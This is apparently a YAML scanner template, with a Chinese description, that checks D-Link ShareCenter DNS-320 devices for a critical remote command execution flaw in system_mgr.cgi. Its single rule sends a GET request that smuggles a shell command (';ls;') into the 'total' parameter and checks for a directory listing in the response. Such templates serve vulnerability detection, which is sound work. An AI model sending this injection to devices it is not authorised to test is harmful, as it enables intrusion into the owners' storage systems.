id: dlink-sharecenter-dns-320-rce

info:
  name: D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞
  author: zan8in
  severity: critical
  description: |
    D-Link ShareCenter DNS-320 system_mgr.cgi 存在远程命令执行，攻击者通过漏洞可以控制服务器
    app="D_Link-DNS-ShareCenter"
  reference:
    - http://wiki.peiqi.tech/wiki/iot/D-Link/D-Link%20ShareCenter%20DNS-320%20system_mgr.cgi%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=;ls;
    expression: response.status == 200 && response.body.bcontains(b'account_mgr.cgi') && response.body.bcontains(b'apkg_mgr.cgi') && response.body.bcontains(b'app_mgr.cgi')
expression: r0()